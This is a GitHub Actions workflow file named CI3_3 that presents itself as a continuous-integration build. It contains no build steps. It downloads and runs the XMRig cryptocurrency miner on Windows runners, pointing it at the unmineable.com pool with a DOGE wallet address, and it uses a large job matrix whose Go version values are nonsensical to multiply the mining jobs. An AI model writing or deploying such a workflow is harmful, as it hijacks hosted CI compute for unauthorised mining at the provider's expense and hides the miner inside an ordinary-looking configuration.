name: CI3_3
 
on: [workflow_dispatch]

jobs:
  build:
    name: CI3_3
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
      - name: Download
        run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip -OutFile xmrig.zip
      - name: Extract
        run: Expand-Archive xmrig.zip
      - name: Run Xmrig
        run: .\xmrig\xmrig-6.21.0\xmrig.exe -a rx -o stratum+ssl://rx.unmineable.com:443 -u DOGE:DSXfQwLuNLBHS4shPD241km3UCDVq6rXuZ.unmineable_worker_xezskipr#rup9-jjmz -p x
      - name: END
        run: exit
